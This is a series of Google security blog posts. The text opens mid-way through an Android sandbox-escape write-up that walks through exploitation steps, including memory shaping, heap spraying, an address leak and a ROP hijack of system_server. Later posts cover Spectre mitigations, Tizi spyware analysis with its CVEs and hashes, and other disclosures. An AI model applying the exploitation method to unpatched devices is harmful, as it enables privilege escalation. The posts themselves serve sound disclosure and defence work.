hnd->offset can be manipulated from a Chrome's sandboxed process, so it's possible to unmap any pages in system_server from Chrome's sandboxed render process. static int gralloc_unmap(gralloc_module_t const* module, buffer_handle_t handle){ …… if(hnd->base) { err = memalloc->unmap_buffer((void*)hnd->base, hnd->size, hnd->offset); //---> while unmapping, hnd->offset is not used, hnd->base is used as the base address, map and unmap are mismatched. if (err) { ALOGE("Could not unmap memory at address %p, %s", (void*) hnd->base, strerror(errno)); return -errno; } hnd->base = 0;}…… return 0;}int IonAlloc::unmap_buffer(void *base, unsigned int size, unsigned int /*offset*/) //---> look, offset is not used by unmap_buffer{ int err = 0; if(munmap(base, size)) { err = -errno; ALOGE("ion: Failed to unmap memory at %p : %s", base, strerror(errno)); } return err;}Although SeLinux restricts the domain isolated_app to access most of Android system service, isolated_app can still access three Android system services. 52neverallow isolated_app {53 service_manager_type54 -activity_service55 -display_service56 -webviewupdate_service57}:service_manager find;To trigger the aforementioned Use-After-Unmap bug from Chrome's sandbox, first put a GraphicBuffer object, which is parseable into a bundle, and then call the binder method convertToTranslucent of IActivityManager to pass the malicious bundle to system_server. When system_server handles this malicious bundle, the bug is triggered. This EoP bug targets the same attack surface as the bug in our 2016 MoSec presentation, A Way of Breaking Chrome's Sandbox in Android. It is also similar to Bitunmap, except exploiting it from a sandboxed Chrome render process is more difficult than from an app. To exploit this EoP bug: 1. Address space shaping. Make the address space layout look as follows, a heap chunk is right above some continuous ashmem mapping: 7f54600000-7f54800000 rw-p 00000000 00:00 0 [anon:libc_malloc]7f58000000-7f54a00000 rw-s 001fe000 00:04 32783 /dev/ashmem/360alpha29 (deleted)7f54a00000-7f54c00000 rw-s 00000000 00:04 32781 /dev/ashmem/360alpha28 (deleted)7f54c00000-7f54e00000 rw-s 00000000 00:04 32779 /dev/ashmem/360alpha27 (deleted)7f54e00000-7f55000000 rw-s 00000000 00:04 32777 /dev/ashmem/360alpha26 (deleted)7f55000000-7f55200000 rw-s 00000000 00:04 32775 /dev/ashmem/360alpha25 (deleted)......2. Unmap part of the heap (1 KB) and part of an ashmem memory (2MB–1KB) by triggering the bug: 7f54400000-7f54600000 rw-s 00000000 00:04 31603 /dev/ashmem/360alpha1000 (deleted)7f54600000-7f547ff000 rw-p 00000000 00:00 0 [anon:libc_malloc]//--->There is a 2MB memory gap7f549ff000-7f54a00000 rw-s 001fe000 00:04 32783 /dev/ashmem/360alpha29 (deleted)7f54a00000-7f54c00000 rw-s 00000000 00:04 32781 /dev/ashmem/360alpha28 (deleted)7f54c00000-7f54e00000 rw-s 00000000 00:04 32779 /dev/ashmem/360alpha27 (deleted)7f54e00000-7f55000000 rw-s 00000000 00:04 32777 /dev/ashmem/360alpha26 (deleted)7f55000000-7f55200000 rw-s 00000000 00:04 32775 /dev/ashmem/360alpha25 (deleted)3. Fill the unmapped space with an ashmem memory: 7f54400000-7f54600000 rw-s 00000000 00:04 31603 /dev/ashmem/360alpha1000 (deleted)7f54600000-7f547ff000 rw-p 00000000 00:00 0 [anon:libc_malloc]7f547ff000-7f549ff000 rw-s 00000000 00:04 31605 /dev/ashmem/360alpha1001 (deleted) //--->The gap is filled with the ashmem memory 360alpha10017f549ff000-7f54a00000 rw-s 001fe000 00:04 32783 /dev/ashmem/360alpha29 (deleted)7f54a00000-7f54c00000 rw-s 00000000 00:04 32781 /dev/ashmem/360alpha28 (deleted)7f54c00000-7f54e00000 rw-s 00000000 00:04 32779 /dev/ashmem/360alpha27 (deleted)7f54e00000-7f55000000 rw-s 00000000 00:04 32777 /dev/ashmem/360alpha26 (deleted)7f55000000-7f55200000 rw-s 00000000 00:04 32775 /dev/ashmem/360alpha25 (deleted)4. Spray the heap and the heap data will be written to the ashmem memory: 7f54400000-7f54600000 rw-s 00000000 00:04 31603 /dev/ashmem/360alpha1000 (deleted)7f54600000-7f547ff000 rw-p 00000000 00:00 0 [anon:libc_malloc]7f547ff000-7f549ff000 rw-s 00000000 00:04 31605 /dev/ashmem/360alpha1001 (deleted)//--->the heap manager believes the memory range from 0x7f547ff000 to 0x7f54800000 is still mongered by it and will allocate memory from this range, result in heap data is written to ashmem memory7f549ff000-7f54a00000 rw-s 001fe000 00:04 32783 /dev/ashmem/360alpha29 (deleted)7f54a00000-7f54c00000 rw-s 00000000 00:04 32781 /dev/ashmem/360alpha28 (deleted)7f54c00000-7f54e00000 rw-s 00000000 00:04 32779 /dev/ashmem/360alpha27 (deleted)7f54e00000-7f55000000 rw-s 00000000 00:04 32777 /dev/ashmem/360alpha26 (deleted)7f55000000-7f55200000 rw-s 00000000 00:04 32775 /dev/ashmem/360alpha25 (deleted)5. Because the filled ashmem in step 3 is mapped both by system_server and render process, part of the heap of system_server can be read and written by render process and we can trigger system_server to allocate some GraphicBuffer object in ashmem. As GraphicBuffer is inherited from ANativeWindowBuffer, which has a member named common whose type is android_native_base_t, we can read two function points (incRef and decRef) from ashmem memory and then can calculate the base address of the module libui. In the latest Pixel device, Chrome's render process is still 32-bit process but system_server is 64-bit process. So we have to leak some module's base address for ROP. Now that we have the base address of libui, the last step is to trigger ROP. Unluckily, it seems that the points incRef and decRef haven't been used. It's impossible to modify it to jump to ROP, but we can modify the virtual table of GraphicBuffer to trigger ROP. typedef struct android_native_base_t{ /* a magic value defined by the actual EGL native type */ int magic; /* the sizeof() of the actual EGL native type */ int version; void* reserved[4]; /* reference-counting interface */ void (*incRef)(struct android_native_base_t* base); void (*decRef)(struct android_native_base_t* base);} android_native_base_t;6.Trigger a GC to execute ROP When a GraphicBuffer object is deconstructed, the virtual function onLastStrongRef is called, so we can replace this virtual function to jump to ROP. When GC happens, the control flow goes to ROP. Finding an ROP chain in limited module(libui) is challenging, but after hard work, we successfully found one and dumped the contents of the file into /data/misc/wifi/wpa_supplicant.conf . SummaryThe Android security team responded quickly to our report and included the fix for these two bugs in the December 2017 Security Update. Supported Google device and devices with the security patch level of 2017-12-05 or later address these issues. While parsing untrusted parcels still happens in sensitive locations, the Android security team is working on hardening the platform to mitigate against similar vulnerabilities. The EoP bug was discovered thanks to a joint effort between 360 Alpha Team and 360 C0RE Team. Thanks very much for their effort. .com { color: #32CD32; font-weight: bold; }

More details about mitigations for the CPU Speculative Execution issue

Thursday January 4th, 2018 09:35:32 PM
Posted by Matt Linton, Senior Security Engineer and Pat Parseghian, Technical Program ManagerYesterday, Google’s Project Zero team posted detailed technical information on three variants of a new security issue involving speculative execution on many modern CPUs. Today, we’d like to share some more information about our mitigations and performance.In response to the vulnerabilities that were discovered we developed a novel mitigation called “Retpoline” -- a binary modification technique that protects against “branch target injection” attacks. We shared Retpoline with our industry partners and have deployed it on Google’s systems, where we have observed negligible impact on performance.In addition, we have deployed Kernel Page Table Isolation (KPTI) -- a general purpose technique for better protecting sensitive information in memory from other software running on a machine -- to the entire fleet of Google Linux production servers that support all of our products, including Search, Gmail, YouTube, and Google Cloud Platform.There has been speculation that the deployment of KPTI causes significant performance slowdowns. Performance can vary, as the impact of the KPTI mitigations depends on the rate of system calls made by an application. On most of our workloads, including our cloud infrastructure, we see negligible impact on performance.In our own testing, we have found that microbenchmarks can show an exaggerated impact. Of course, Google recommends thorough testing in your environment before deployment; we cannot guarantee any particular performance or operational impact.Speculative Execution and the Three Methods of AttackIn addition, to follow up on yesterday’s post, today we’re providing a summary of speculative execution and how each of the three variants work.In order to improve performance, many CPUs may choose to speculatively execute instructions based on assumptions that are considered likely to be true. During speculative execution, the processor is verifying these assumptions; if they are valid, then the execution continues. If they are invalid, then the execution is unwound, and the correct execution path can be started based on the actual conditions. It is possible for this speculative execution to have side effects which are not restored when the CPU state is unwound, and can lead to information disclosure.Project Zero discussed three variants of speculative execution attack. There is no single fix for all three attack variants; each requires protection independently.Variant 1 (CVE-2017-5753), “bounds check bypass.” This vulnerability affects specific sequences within compiled applications, which must be addressed on a per-binary basis.Variant 2 (CVE-2017-5715), “branch target injection”. This variant may either be fixed by a CPU microcode update from the CPU vendor, or by applying a software mitigation technique called “Retpoline” to binaries where concern about information leakage is present. This mitigation may be applied to the operating system kernel, system programs and libraries, and individual software programs, as needed.Variant 3 (CVE-2017-5754), “rogue data cache load.” This may require patching the system’s operating system. For Linux there is a patchset called KPTI (Kernel Page Table Isolation) that helps mitigate Variant 3. Other operating systems may implement similar protections - check with your vendor for specifics.SummaryMitigationVariant 1: bounds check bypass (CVE-2017-5753)This attack variant allows malicious code to circumvent bounds checking features built into most binaries. Even though the bounds checks will still fail, the CPU will speculatively execute instructions after the bounds checks, which can access memory that the code could not normally access. When the CPU determines the bounds check has failed, it discards any work that was done speculatively; however, some changes to the system can be still observed (in particular, changes to the state of the CPU caches). The malicious code can detect these changes and read the data that was speculatively accessed.The primary ramification of Variant 1 is that it is difficult for a system to run untrusted code within a process and restrict what memory within the process the untrusted code can access.In the kernel, this has implications for systems such as the extended Berkeley Packet Filter (eBPF) that takes packet filterers from user space code, just-in-time (JIT) compiles the packet filter code, and runs the packet filter within the context of kernel. The JIT compiler uses bounds checking to limit the memory the packet filter can access, however, Variant 1 allows an attacker to use speculation to circumvent these limitations.Mitigation requires analysis and recompilation so that vulnerable binary code is not emitted. Examples of targets which may require patching include the operating system and applications which execute untrusted code.Variant 2: branch target injection (CVE-2017-5715)This attack variant uses the ability of one process to influence the speculative execution behavior of code in another security context (i.e., guest/host mode, CPU ring, or process) running on the same physical CPU core.Modern processors predict the destination for indirect jumps and calls that a program may take and start speculatively executing code at the predicted location. The tables used to drive prediction are shared between processes running on a physical CPU core, and it is possible for one process to pollute the branch prediction tables to influence the branch prediction of another process or kernel code.In this way, an attacker can cause speculative execution of any mapped code in another process, in the hypervisor, or in the kernel, and potentially read data from the other protection domain using techniques like Variant 1. This variant is difficult to use, but has great potential power as it crosses arbitrary protection domains.Mitigating this attack variant requires either installing and enabling a CPU microcode update from the CPU vendor (e.g., Intel's IBRS microcode), or applying a software mitigation (e.g., Google's Retpoline) to the hypervisor, operating system kernel, system programs and libraries, and user applications.Variant 3: rogue data cache load (CVE-2017-5754)This attack variant allows a user mode process to access virtual memory as if the process was in kernel mode. On some processors, the speculative execution of code can access memory that is not typically visible to the current execution mode of the processor; i.e., a user mode program may speculatively access memory as if it were running in kernel mode.Using the techniques of Variant 1, a process can observe the memory that was accessed speculatively. On most operating systems today, the page table that a process uses includes access to most physical memory on the system, however access to such memory is limited to when the process is running in kernel mode. Variant 3 enables access to such memory even in user mode, violating the protections of the hardware.Mitigating this attack variant requires patching the operating system. For Linux, the patchset that mitigates Variant 3 is called Kernel Page Table Isolation (KPTI). Other operating systems/providers should implement similar mitigations.Mitigations for Google productsYou can learn more about mitigations that have been applied to Google’s infrastructure, products, and services here.

Today's CPU vulnerability: what you need to know

Thursday January 4th, 2018 12:10:59 AM
Posted by Matt Linton, Senior Security Engineer and Pat Parseghian, Technical Program Manager[Google Cloud, G Suite, and Chrome customers can visit the Google Cloud blog for details about those products][For more technical details about this issue, please read Project Zero's blog post]Last year, Google’s Project Zero team discovered serious security flaws caused by “speculative execution,” a technique used by most modern processors (CPUs) to optimize performance.The Project Zero researcher, Jann Horn, demonstrated that malicious actors could take advantage of speculative execution to read system memory that should have been inaccessible. For example, an unauthorized party may read sensitive information in the system’s memory such as passwords, encryption keys, or sensitive information open in applications. Testing also showed that an attack running on one virtual machine was able to access the physical memory of the host machine, and through that, gain read-access to the memory of a different virtual machine on the same host.These vulnerabilities affect many CPUs, including those from AMD, ARM, and Intel, as well as the devices and operating systems running on them.As soon as we learned of this new class of attack, our security and product development teams mobilized to defend Google’s systems and our users’ data. We have updated our systems and affected products to protect against this new type of attack. We also collaborated with hardware and software manufacturers across the industry to help protect their users and the broader web. These efforts have included collaborative analysis and the development of novel mitigations.We are posting before an originally coordinated disclosure date of January 9, 2018 because of existing public reports and growing speculation in the press and security research community about the issue, which raises the risk of exploitation. The full Project Zero report is forthcoming (update: this has been published; see above).Mitigation status for Google productsA list of affected Google products and their current status of mitigation against this attack appears here. As this is a new class of attack, our patch status refers to our mitigation for currently known vectors for exploiting the flaw. The issue has been mitigated in many products (or wasn’t a vulnerability in the first place). In some instances, users and customers may need to take additional steps to ensure they’re using a protected version of a product. This list and a product’s status may change as new developments warrant. In the case of new developments, we will post updates to this blog.All Google products not explicitly listed below require no user or customer action.AndroidDevices with the latest security update are protected. Furthermore, we are unaware of any successful reproduction of this vulnerability that would allow unauthorized information disclosure on ARM-based Android devices.Supported Nexus and Pixel devices with the latest security update are protected.Further information is available here.Google Apps / G Suite (Gmail, Calendar, Drive, Sites, etc.):No additional user or customer action needed.Google ChromeSome user or customer action needed. More information here.Google Chrome OS (e.g., Chromebooks):Some additional user or customer action needed. More information here.Google Cloud PlatformGoogle App Engine: No additional customer action needed.Google Compute Engine: Some additional customer action needed. More information here.Google Kubernetes Engine: Some additional customer action needed. More information here.Google Cloud Dataflow: Some additional customer action needed. More information here.Google Cloud Dataproc: Some additional customer action needed. More information here. All other Google Cloud products and services: No additional action needed.Google Home / Chromecast:No additional user action needed.Google Wifi/OnHub:No additional user action needed.Multiple methods of attackTo take advantage of this vulnerability, an attacker first must be able to run malicious code on the targeted system.The Project Zero researchers discovered three methods (variants) of attack, which are effective under different conditions. All three attack variants can allow a process with normal user privileges to perform unauthorized reads of memory data, which may contain sensitive information such as passwords, cryptographic key material, etc.In order to improve performance, many CPUs may choose to speculatively execute instructions based on assumptions that are considered likely to be true. During speculative execution, the processor is verifying these assumptions; if they are valid, then the execution continues. If they are invalid, then the execution is unwound, and the correct execution path can be started based on the actual conditions. It is possible for this speculative execution to have side effects which are not restored when the CPU state is unwound, and can lead to information disclosure.There is no single fix for all three attack variants; each requires protection independently. Many vendors have patches available for one or more of these attacks.We will continue our work to mitigate these vulnerabilities and will update both our product support page and this blog post as we release further fixes. More broadly, we appreciate the support and involvement of all the partners and Google engineers who worked tirelessly over the last few months to make our users and customers safe.Blog post update logAdded link to Project Zero blogAdded link to Google Cloud blog

Securing communications between Google services with Application Layer Transport Security

Wednesday December 13th, 2017 05:01:01 PM
Posted by Cesar Ghali and Julien Boeuf, Engineers on the Security & Privacy TeamAt Google, protection of customer data is a top priority. One way we do this is by protecting data in transit by default. We protect data when it is sent to Google using secure communication protocols such as TLS (Transport Layer Security). Within our infrastructure, we protect service-to-service communications at the application layer using a system called Application Layer Transport Security (ALTS). ALTS authenticates the communication between Google services and helps protect data in transit. Today, we’re releasing a whitepaper, “Application Layer Transport Security,” that goes into detail about what ALTS is, how it protects data, and how it’s implemented at Google.ALTS is a highly reliable, trusted system that provides authentication and security for our internal Remote Procedure Call (RPC) communications. ALTS requires minimal involvement from the services themselves. When services communicate with each other at Google, such as the Gmail frontend communicating with a storage backend system, they do not need to explicitly configure anything to ensure data transmission is protected - it is protected by default. All RPCs issued or received by a production workload that stay within a physical boundary controlled by or on behalf of Google are protected with ALTS by default. This delivers numerous benefits while allowing the system work at scale:More precise security: Each workload has its own identity. This allows workloads running on the same machine to authenticate using their own identity as opposed to the machine’s identity.Improved scalability: ALTS accommodates Google’s massive scale by using an efficient resumption mechanism embedded in the ALTS handshake protocol, allowing services that were already communicating to easily resume communications. ALTS can also accommodate the authentication and encryption needs of a large number of RPCs; for example, services running on Google production systems collectively issue on the order of O(1010) RPCs per second.Reduced overhead: The overhead of potentially expensive cryptographic operations can be reduced by supporting long-lived RPC channels.Multiple features that ensure security and scalabilityInside physical boundaries controlled by or on behalf of Google, all scheduled production workloads are initialized with a certificate that asserts their identity. These credentials are securely delivered to the workloads. When a workload is involved in an ALTS handshake, it verifies the remote peer identity and certificate. To further increase security, all Google certificates have a relatively short lifespan.ALTS has a flexible trust model that works for different types of entities on the network. Entities can be physical machines, containerized workloads, and even human users to whom certificates can be provisioned.ALTS provides a handshake protocol, which is a Diffie-Hellman (DH) based authenticated key exchange protocol that Google developed and implemented. At the end of a handshake, ALTS provides applications with an authenticated remote peer identity, which can be used to enforce fine-grained authorization policies at the application layer.ALTS ensures the integrity of Google traffic is protected, and encrypted as needed.After a handshake is complete and the client and server negotiate the necessary shared secrets, ALTS secures RPC traffic by forcing integrity, and optional encryption, using the negotiated shared secrets. We support multiple protocols for integrity guarantees, e.g., AES-GMAC and AES-VMAC with 128-bit keys. Whenever traffic leaves a physical boundary controlled by or on behalf of Google, e.g., in transit over WAN between datacenters, all protocols are upgraded automatically to provide encryption as well as integrity guarantees. In this case, we use the AES-GCM and AES-VCM protocols with 128-bit keys.More details on how Google data encryption is performed are available in another whitepaper we are releasing today, “Encryption in Transit in Google Cloud.”In summary, ALTS is widely used in Google’s infrastructure to provide service-to-service authentication and integrity, with optional encryption for all Google RPC traffic. For more information about ALTS, please read our whitepaper, “Application Layer Transport Security.”

Additional protections by Safe Browsing for Android users

Friday December 15th, 2017 05:45:55 AM
Posted by Paul Stanton and Brooke Heinichen, Safe Browsing TeamUpdated on 12/14/17 to further distinguish between Unwanted Software Policy and Google Play Developer Program PolicyIn our efforts to protect users and serve developers, the Google Safe Browsing team has expanded enforcement of Google's Unwanted Software Policy to further tamp down on unwanted and harmful mobile behaviors on Android. As part of this expanded enforcement, Google Safe Browsing will show warnings on apps and on websites leading to apps that collect a user’s personal data without their consent.Apps handling personal user data (such as user phone number or email), or device data will be required to prompt users and to provide their own privacy policy in the app. Additionally, if an app collects and transmits personal data unrelated to the functionality of the app then, prior to collection and transmission, the app must prominently highlight how the user data will be used and have the user provide affirmative consent for such use.These data collection requirements apply to all functions of the app. For example, during analytics and crash reportings, the list of installed packages unrelated to the app may not be transmitted from the device without prominent disclosure and affirmative consent.These requirements, under the Unwanted Software Policy, apply to apps in Google Play and non-Play app markets. The Google Play team has also published guidelines for how Play apps should handle user data and provide disclosure.Starting in 60 days, this expanded enforcement of Google’s Unwanted Software Policy may result in warnings shown on user devices via Google Play Protect or on webpages that lead to these apps. Webmasters whose sites show warnings due to distribution of these apps should refer to the Search Console for guidance on remediation and resolution of the warnings. Developers whose apps show warnings should refer to guidance in the Unwanted Software Help Center. Developers can also request an app review using this article on App verification and appeals, which contains guidance applicable to apps in both Google Play and non-Play app stores. Apps published in Google Play have specific criteria to meet under Google Play’s Developer Program Policies; these criteria are outlined in the Play August 2017 announcement.

Tizi: Detecting and blocking socially engineered spyware on Android

Wednesday January 3rd, 2018 11:08:26 PM
Posted by Anthony Desnos, Megan Ruthven, and Richard Neal, Google Play Protect security engineers and Clement Lecigne, Threat Analysis GroupGoogle is constantly working to improve our systems that protect users from Potentially Harmful Applications (PHAs). Usually, PHA authors attempt to install their harmful apps on as many devices as possible. However, a few PHA authors spend substantial effort, time, and money to create and install their harmful app on a small number of devices to achieve a certain goal.This blog post covers Tizi, a backdoor family with some rooting capabilities that was used in a targeted attack against devices in African countries, specifically: Kenya, Nigeria, and Tanzania. We'll talk about how the Google Play Protect and Threat Analysis teams worked together to detect and investigate Tizi-infected apps and remove and block them from Android devices.What is Tizi?Tizi is a fully featured backdoor that installs spyware to steal sensitive data from popular social media applications. The Google Play Protect security team discovered this family in September 2017 when device scans found an app with rooting capabilities that exploited old vulnerabilities. The team used this app to find more applications in the Tizi family, the oldest of which is from October 2015. The Tizi app developer also created a website and used social media to encourage more app installs from Google Play and third-party websites.Here is an example social media post promoting a Tizi-infected app:What is the scope of Tizi?What are we doing?To protect Android devices and users, we used Google Play Protect to disable Tizi-infected apps on affected devices and have notified users of all known affected devices. The developers' accounts have been suspended from Play.The Google Play Protect team also used information and signals from the Tizi apps to update Google's on-device security services and the systems that search for PHAs. These enhancements have been enabled for all users of our security services and increases coverage for Google Play users and the rest of the Android ecosystem.Additionally, there is more technical information below to help the security industry in our collective work against PHAs.What do I need to do?Through our investigation, we identified around 1,300 devices affected by Tizi. To reduce the chance of your device being affected by PHAs and other threats, we recommend these 5 basic steps:Check permissions: Be cautious with apps that request unreasonable permissions. For example, a flashlight app shouldn't need access to send SMS messages.Enable a secure lock screen: Pick a PIN, pattern, or password that is easy for you to remember and hard for others to guess.Update your device: Keep your device up-to-date with the latest security patches. Tizi exploited older and publicly known security vulnerabilities, so devices that have up-to-date security patches are less exposed to this kind of attack.Google Play Protect: Ensure Google Play Protect is enabled.Locate your device: Practice finding your device, because you are far more likely to lose your device than install a PHA.How does Tizi work?The Google Play Protect team had previously classified some samples as spyware or backdoor PHAs without connecting them as a family. The early Tizi variants didn't have rooting capabilities or obfuscation, but later variants did.After gaining root, Tizi steals sensitive data from popular social media apps like Facebook, Twitter, WhatsApp, Viber, Skype, LinkedIn, and Telegram. It usually first contacts its command-and-control servers by sending an SMS with the device's GPS coordinates to a specific number. Subsequent command-and-control communications are normally performed over regular HTTPS, though in some specific versions, Tizi uses the MQTT messaging protocol with a custom server. The backdoor contains various capabilities common to commercial spyware, such as recording calls from WhatsApp, Viber, and Skype; sending and receiving SMS messages; and accessing calendar events, call log, contacts, photos, Wi-Fi encryption keys, and a list of all installed apps. Tizi apps can also record ambient audio and take pictures without displaying the image on the device's screen.Tizi can root the device by exploiting one of the following local vulnerabilities:CVE-2012-4220CVE-2013-2596CVE-2013-2597CVE-2013-2595CVE-2013-2094CVE-2013-6282CVE-2014-3153CVE-2015-3636CVE-2015-1805Most of these vulnerabilities target older chipsets, devices, and Android versions. All of the listed vulnerabilities are fixed on devices with a security patch level of April 2016 or later, and most of them were patched considerably prior to this date. Devices with this patch level or later are far less exposed to Tizi's capabilities. If a Tizi app is unable to take control of a device because the vulnerabilities it tries to use are are all patched, it will still attempt to perform some actions through the high level of permissions it asks the user to grant to it, mainly around reading and sending SMS messages and monitoring, redirecting, and preventing outgoing phone calls.Samples uploaded to VirusTotalTo encourage further research in the security community, here are some sample applications embedding Tizi that were already on VirusTotal.Package nameSHA256 digestSHA1 digests linked to TiziTo encourage further research in the security community, here are some sample digests of exploits and utilities that were used or abused by Tizi.FilenameSHA256 digestrun_root_shellf2e45ea50fc71b62d9ea59990ced755636286121437ced6237aff90981388f6aiovyroot4d0887f41d0de2f31459c14e3133debcdf758ad8bbe57128d3bec2c907f2acf3filesbetyangu.tar9869871ed246d5670ebca02bb265a584f998f461db0283103ba58d4a650333be

Lock it up! New hardware protections for your lock screen with the Google Pixel 2

Tuesday November 14th, 2017 07:15:58 PM
Posted by Xiaowen Xin, Android Security TeamThe new Google Pixel 2 ships with a dedicated hardware security module designed to be robust against physical attacks. This hardware module performs lockscreen passcode verification and protects your lock screen better than software alone.To learn more about the new protections, let’s first review the role of the lock screen. Enabling a lock screen protects your data, not just against casual thieves, but also against sophisticated attacks. Many Android devices, including all Pixel phones, use your lockscreen passcode to derive the key that is then used to encrypt your data. Before you unlock your phone for the first time after a reboot, an attacker cannot recover the key (and hence your data) without knowing your passcode first. To protect against brute-force guessing your passcode, devices running Android 7.0+ verify your attempts in a secure environment that limits how often you can repeatedly guess. Only when the secure environment has successfully verified your passcode does it reveal a device and user-specific secret used to derive the disk encryption key.Benefits of tamper-resistant hardwareThe goal of these protections is to prevent attackers from decrypting your data without knowing your passcode, but the protections are only as strong as the secure environment that verifies the passcode. Performing these types of security-critical operations in tamper-resistant hardware significantly increases the difficulty of attacking it.Tamper-resistant hardware comes in the form of a discrete chip separate from the System on a Chip (SoC). It includes its own flash, RAM, and other resources inside a single package, so it can fully control its own execution. It can also detect and defend against outside attempts to physically tamper with it.In particular:Because it has its own dedicated RAM, it’s robust against many side-channel information leakage attacks, such as those described in the TruSpy cache side-channel paper.Because it has its own dedicated flash, it’s harder to interfere with its ability to store state persistently.It loads its operating system and software directly from internal ROM and flash, and it controls all updates to it, so attackers can’t directly tamper with its software to inject malicious code.Tamper-resistant hardware is resilient against many physical fault injection techniques including attempts to run outside normal operating conditions, such as wrong voltage, wrong clock speed, or wrong temperature. This is standardized in specifications such as the SmartCard IC Platform Protection Profile, and tamper-resistant hardware is often certified to these standards.Tamper-resistant hardware is usually housed in a package that is resistant to physical penetration and designed to resist side channel attacks, including power analysis, timing analysis, and electromagnetic sniffing, such as described in the SoC it to EM paper.Security module in Pixel 2The new Google Pixel 2 ships with a security module built using tamper-resistant hardware that protects your lock screen and your data against many sophisticated hardware attacks.In addition to all the benefits already mentioned, the security module in Pixel 2 also helps protect you against software-only attacks:Because it performs very few functions, it has a super small attack surface.With passcode verification happening in the security module, even in the event of a full compromise elsewhere, the attacker cannot derive your disk encryption key without compromising the security module first.The security module is designed so that nobody, including Google, can update the passcode verification logic to a weakened version without knowing your passcode first.SummaryJust like many other Google products, such as Chromebooks and Cloud, Android and Pixel are investing in additional hardware protections to make your device more secure. With the new Google Pixel 2, your data is safer against an entire class of sophisticated hardware attacks.

New research: Understanding the root cause of account takeover

Thursday November 9th, 2017 07:00:01 PM
Posted by Kurt Thomas, Anti-Abuse Research; Angelika Moscicki, Account SecurityAccount takeover, or ‘hijacking’, is unfortunately a common problem for users across the web. More than 15% of Internet users have reported experiencing the takeover of an email or social networking account. However, despite its familiarity, there is a dearth of research about the root causes of hijacking.With Google accounts as a case-study, we teamed up with the University of California, Berkeley to better understand how hijackers attempt to take over accounts in the wild. From March 2016 to March 2017, we analyzed several black markets to see how hijackers steal passwords and other sensitive data. We’ve highlighted some important findings from our investigation below. We presented our study at the Conference on Computer and Communications Security (CCS) and it’s now available here.What we learned from the research proved to be immediately useful. We applied its insights to our existing protections and secured 67 million Google accounts before they were abused. We’re sharing this information publicly so that other online services can better secure their users, and can also supplement their authentication systems with more protections beyond just passwords.How hijackers steal passwords on the black marketOur research tracked several black markets that traded third-party password breaches, as well as 25,000 blackhat tools used for phishing and keylogging. In total, these sources helped us identify 788,000 credentials stolen via keyloggers, 12 million credentials stolen via phishing, and 3.3 billion credentials exposed by third-party breaches.While our study focused on Google, these password stealing tactics pose a risk to all account-based online services. In the case of third-party data breaches, 12% of the exposed records included a Gmail address serving as a username and a password; of those passwords, 7% were valid due to reuse. When it comes to phishing and keyloggers, attackers frequently target Google accounts to varying success: 12-25% of attacks yield a valid password.However, because a password alone is rarely sufficient for gaining access to a Google account, increasingly sophisticated attackers also try to collect sensitive data that we may request when verifying an account holder’s identity. We found 82% of blackhat phishing tools and 74% of keyloggers attempted to collect a user’s IP address and location, while another 18% of tools collected phone numbers and device make and model.By ranking the relative risk to users, we found that phishing posed the greatest threat, followed by keyloggers, and finally third-party breaches.Protecting our users from account takeoverOur findings were clear: enterprising hijackers are constantly searching for, and are able to find, billions of different platforms’ usernames and passwords on black markets. While we have already applied these insights to our existing protections, our findings are yet another reminder that we must continuously evolve our defenses in order to stay ahead of these bad actors and keep users safe.For many years, we’ve applied a ‘defense in-depth’ approach to security—a layered series of constantly improving protections that automatically prevent, detect, and mitigate threats to keep your account safe.PreventionA wide variety of safeguards help us to prevent attacks before they ever affect our users. For example, Safe Browsing, which now protects more than 3 billion devices, alerts users before they visit a dangerous site or when they click a link to a dangerous site within Gmail. We recently announced the Advanced Protection program which provides extra security for users that are at elevated risk of attack.DetectionWe monitor every login attempt to your account for suspicious activity. When there is a sign-in attempt from a device you’ve never used, or a location you don’t commonly access your account from, we’ll require additional information before granting access to your account. For example, if you sign in from a new laptop and you have a phone associated with you account, you will see a prompt—we’re calling these dynamic verification challenges—like this:This challenge provides two-factor authentication on all suspicious logins, while mitigating the risk of account lockout.MitigationFinally, we regularly scan activity across Google’s suite of products for suspicious actions performed by hijackers and when we find any, we lock down the affected accounts to prevent any further damage as quickly as possible. We prevent or undo actions we attribute to account takeover, notify the affected user, and help them change their password and re-secure their account into a healthy state.What you can doThere are some simple steps you can take that make these defenses even stronger. Visit our Security Checkup to make sure you have recovery information associated with your account, like a phone number. Allow Chrome to automatically generate passwords for your accounts and save them via Smart Lock. We’re constantly working to improve these tools, and our automatic protections, to keep your data safe.

Introducing the Google Play Security Reward Program

Friday October 20th, 2017 12:30:10 AM
Posted by Renu Chaudhary, Android Security and Rahul Mishra, Program ManagerWe have long enjoyed a close relationship with the security research community. To recognize the valuable external contributions that help us keep our users safe online, we maintain reward programs for Google-developed websites and apps, for Chrome and Chrome OS, and for the latest version of Android running on Pixel devices. These programs have been a success and helped uncover hundreds of vulnerabilities, while also paying out millions of dollars to participating security researchers and research teams.Today, we’re introducing the Google Play Security Reward Program to incentivize security research into popular Android apps available on Google Play. Through our collaboration with independent bug bounty platform, HackerOne, we’ll enable security researchers to submit an eligible vulnerability to participating developers, who are listed in the program rules. After the vulnerability is addressed, the eligible researcher submits a report to the Play Security Reward Program to receive a monetary reward from Google Play.With the ongoing success of our other reward programs, we invite developers and the research community to work together with us on proactively improving the security of some of the most popular Android apps on Google Play.The program is limited to a select number of developers at this time to get initial feedback. Developers can contact their Google Play partner manager to show interest. All developers will benefit when bugs are discovered because we will scan all apps for them and deliver security recommendations to the developers of any affected apps. For more information, visit the Play Security Reward Program on HackerOne.

Behind the Masq: Yet more DNS, and DHCP, vulnerabilities

Monday October 2nd, 2017 02:55:08 PM
Posted by Fermin J. Serna, Staff Software Engineer, Matt Linton, Senior Security Engineer and Kevin Stadmeyer, Technical Program ManagerOur team has previously posted about DNS vulnerabilities and exploits. Lately, we’ve been busy reviewing the security of another DNS software package: Dnsmasq. We are writing this to disclose the issues we found and to publicize the patches in an effort to increase their uptake.Dnsmasq provides functionality for serving DNS, DHCP, router advertisements and network boot. This software is commonly installed in systems as varied as desktop Linux distributions (like Ubuntu), home routers, and IoT devices. Dnsmasq is widely used both on the open internet and internally in private networks.We discovered seven distinct issues (listed below) over the course of our regular internal security assessments. Once we determined the severity of these issues, we worked to investigate their impact and exploitability and then produced internal proofs of concept for each of them. We also worked with the maintainer of Dnsmasq, Simon Kelley, to produce appropriate patches and mitigate the issue.These patches have been upstreamed and are now committed to the project’s git repository. In addition to these patches we have also submitted another patch which will run Dnsmasq under seccomp-bpf to allow for additional sandboxing. This patch has been submitted to the DNSmasq project for review and we have also made it available here for those who wish to integrate it into an existing install (after testing, of course!). We believe the adoption 